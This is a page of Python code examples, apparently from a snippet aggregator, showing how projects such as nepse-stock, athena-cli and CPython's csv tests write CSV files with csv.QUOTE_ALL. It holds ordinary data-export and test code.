            'dialect': 'excel',
            'quoting': csv.QUOTE_ALL,
        }
项目:Smelly-London    作者:Smelly-London    | 项目源码 | 文件源码
def write_dict_to_csv(list_of_dictionaries, output_file):
    """write a list of dictionaries to a csv file."""

    fieldnames = ['centroid_lon', 'centroid_lat', 'feature_type', 'name', 'source']

    with open(output_file, 'w', newline = '') as f:
        w = csv.DictWriter(f, fieldnames, quoting = csv.QUOTE_ALL)
        w.writeheader()
        w.writerows(list_of_dictionaries)
项目:nepse-stock    作者:sachin38    | 项目源码 | 文件源码
def write_to_csv(received_data = [], *args):
    first_data = ["Company", "Last Traded Price", "Change", "Total Listed Shares", "Paid Up Value", "Total Paid Up Value", "Closing Market Price", "Market Capitalization"]

    if os.path.isfile("datafile.csv"):
        with open("datafile.csv", "a") as output:
            writer = csv.writer(output, quoting=csv.QUOTE_ALL)
            writer.writerow(received_data)
            received_data[:] = []
    else:
        with open("datafile.csv", "w") as output:
            writer = csv.writer(output, quoting=csv.QUOTE_ALL)
            writer.writerow(first_data)
            writer.writerow(received_data)
            received_data[:] = []
项目:pentestly    作者:praetorian-inc    | 项目源码 | 文件源码
def module_run(self):
        filename = self.options['filename']
        # codecs module not used because the csv module converts to ascii
        with open(filename, 'w') as outfile:
            # build a list of table names
            table = self.options['table']
            rows = self.query('SELECT * FROM "%s" ORDER BY 1' % (table))
            cnt = 0
            for row in rows:
                row = [x if x else '' for x in row]
                if any(row):
                    cnt += 1
                    csvwriter = csv.writer(outfile, quoting=csv.QUOTE_ALL)
                    csvwriter.writerow([s.encode("utf-8") for s in row])
        self.output('%d records added to \'%s\'.' % (cnt, filename))
项目:twitter_mongodb_helper    作者:IDEA-NTHU-Taiwan    | 项目源码 | 文件源码
def write_csv_file(filename, result, path):
    """Writes the result to csv with the given filename.
    Args:
        filename   (str): Filename to write to.
        path       (str): Directory path to use.
    """

    output = open(path + filename + '.csv', 'wb')
    writer = csv.writer(output, quoting=csv.QUOTE_ALL, lineterminator='\n')
    for val in result:
        writer.writerow([val])
    # Print one a single row
    # writer.writerow(result)
项目:athena-cli    作者:guardian    | 项目源码 | 文件源码
def execute(self, statement):
        execution_id = self.athena.start_query_execution(self.dbname, statement)
        if not execution_id:
            return

        while True:
            stats = self.athena.get_query_execution(execution_id)
            status = stats['QueryExecution']['Status']['State']
            if status in ['SUCCEEDED', 'FAILED', 'CANCELLED']:
                break
            time.sleep(0.2)  # 200ms

        if status == 'SUCCEEDED':
            results = self.athena.get_query_results(execution_id)
            headers = [h['Name'].encode("utf-8") for h in results['ResultSet']['ResultSetMetadata']['ColumnInfo']]

            if self.format in ['CSV', 'CSV_HEADER']:
                csv_writer = csv.writer(sys.stdout, quoting=csv.QUOTE_ALL)
                if self.format == 'CSV_HEADER':
                    csv_writer.writerow(headers)
                csv_writer.writerows([[text.encode("utf-8") for text in row] for row in self.athena.yield_rows(results, headers)])
            elif self.format == 'TSV':
                print(tabulate([row for row in self.athena.yield_rows(results, headers)], tablefmt='tsv'))
            elif self.format == 'TSV_HEADER':
                print(tabulate([row for row in self.athena.yield_rows(results, headers)], headers=headers, tablefmt='tsv'))
            elif self.format == 'VERTICAL':
                for num, row in enumerate(self.athena.yield_rows(results, headers)):
                    print('--[RECORD {}]--'.format(num+1))
                    print(tabulate(zip(*[headers, row]), tablefmt='presto'))
            else:  # ALIGNED
                print(tabulate([x for x in self.athena.yield_rows(results, headers)], headers=headers, tablefmt='presto'))

        if status == 'FAILED':
            print(stats['QueryExecution']['Status']['StateChangeReason'])
项目:EEGSignalAnalysis    作者:pprakhar30    | 项目源码 | 文件源码
def Y_Output():

    mylist = [1,1,0,0,1,1,1,1,0,1,1,0,1,1,1,0,0,1,0,0,1,1,1,1,0]
    myfile = open("sandeep_Y.csv", 'wb')
    wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)
    wr.writerow(mylist)

    with open('prakhar_Y.csv', 'rb') as csvfile:
             spamreader = csv.reader(csvfile)
             for row in spamreader:
                print row
项目:zippy    作者:securesystemslab    | 项目源码 | 文件源码
def test_write_quoting(self):
        self._write_test(['a',1,'p,q'], 'a,1,"p,q"')
        self.assertRaises(csv.Error,
                          self._write_test,
                          ['a',1,'p,q'], 'a,1,p,q',
                          quoting = csv.QUOTE_NONE)
        self._write_test(['a',1,'p,q'], 'a,1,"p,q"',
                         quoting = csv.QUOTE_MINIMAL)
        self._write_test(['a',1,'p,q'], '"a",1,"p,q"',
                         quoting = csv.QUOTE_NONNUMERIC)
        self._write_test(['a',1,'p,q'], '"a","1","p,q"',
                         quoting = csv.QUOTE_ALL)
        self._write_test(['a\nb',1], '"a\nb","1"',
                         quoting = csv.QUOTE_ALL)
项目:oil    作者:oilshell    | 项目源码 | 文件源码
def test_write_quoting(self):
        self._write_test(['a',1,'p,q'], 'a,1,"p,q"')
        self._write_error_test(csv.Error, ['a',1,'p,q'],
                               quoting = csv.QUOTE_NONE)
        self._write_test(['a',1,'p,q'], 'a,1,"p,q"',
                         quoting = csv.QUOTE_MINIMAL)
        self._write_test(['a',1,'p,q'], '"a",1,"p,q"',
                         quoting = csv.QUOTE_NONNUMERIC)
        self._write_test(['a',1,'p,q'], '"a","1","p,q"',
                         quoting = csv.QUOTE_ALL)
        self._write_test(['a\nb',1], '"a\nb","1"',
                         quoting = csv.QUOTE_ALL)
项目:python2-tracer    作者:extremecoders-re    | 项目源码 | 文件源码
def test_write_quoting(self):
        self._write_test(['a',1,'p,q'], 'a,1,"p,q"')
        self._write_error_test(csv.Error, ['a',1,'p,q'],
                               quoting = csv.QUOTE_NONE)
        self._write_test(['a',1,'p,q'], 'a,1,"p,q"',
                         quoting = csv.QUOTE_MINIMAL)
        self._write_test(['a',1,'p,q'], '"a",1,"p,q"',
                         quoting = csv.QUOTE_NONNUMERIC)
        self._write_test(['a',1,'p,q'], '"a","1","p,q"',
                         quoting = csv.QUOTE_ALL)
        self._write_test(['a\nb',1], '"a\nb","1"',
                         quoting = csv.QUOTE_ALL)
项目:python2-tracer    作者:extremecoders-re    | 项目源码 | 文件源码
def test_quoting(self):
        class mydialect(csv.Dialect):
            delimiter = ";"
            escapechar = '\\'
            doublequote = False
            skipinitialspace = True
            lineterminator = '\r\n'
            quoting = csv.QUOTE_NONE
        d = mydialect()
        self.assertEqual(d.quoting, csv.QUOTE_NONE)

        mydialect.quoting = None
        self.assertRaises(csv.Error, mydialect)

        mydialect.doublequote = True
        mydialect.quoting = csv.QUOTE_ALL
        mydialect.quotechar = '"'
        d = mydialect()
        self.assertEqual(d.quoting, csv.QUOTE_ALL)
        self.assertEqual(d.quotechar, '"')
        self.assertTrue(d.doublequote)

        mydialect.quotechar = "''"
        with self.assertRaises(csv.Error) as cm:
            mydialect()
        self.assertEqual(str(cm.exception),
                         '"quotechar" must be an 1-character string')

        mydialect.quotechar = 4
        with self.assertRaises(csv.Error) as cm:
            mydialect()
        self.assertEqual(str(cm.exception),
                         '"quotechar" must be string, not int')
项目:ppytrading    作者:yusukemurayama    | 项目源码 | 文件源码
def __create_stocklist(self):
        """???????CSV????????????

        Returns:
            ????????????????????????
        """
        def get_row(idx):
            """CSV????1???????????"""
            return ('TEST{}'.format(idx),
                    'Test {}'.format(idx),
                    'Sector {}'.format(idx % 10),)

        header = ('Symbol', 'Name', 'Sector',)
        num_markets = len(const.MARKET_DATA.keys())
        lis = [[
            get_row(idx2) for idx2, row in enumerate(range(self.num_stocks))
            if idx2 % num_markets == idx1
        ] for idx1 in range(len(const.MARKET_DATA.keys()))]

        for idx, (market_id, market_name) in enumerate(const.MARKET_DATA.items()):
            with open(os.path.join(self.dest_dir_stocklist, market_name + '.csv'), 'w',
                      encoding=const.DEFAULT_FILE_ENCODING, newline='') as fp:
                writer = csv.writer(fp, quoting=csv.QUOTE_ALL)
                writer.writerow(header)
                writer.writerows(lis[idx])

        return [row[0] for row in chain(*lis)]  # Symbol??????????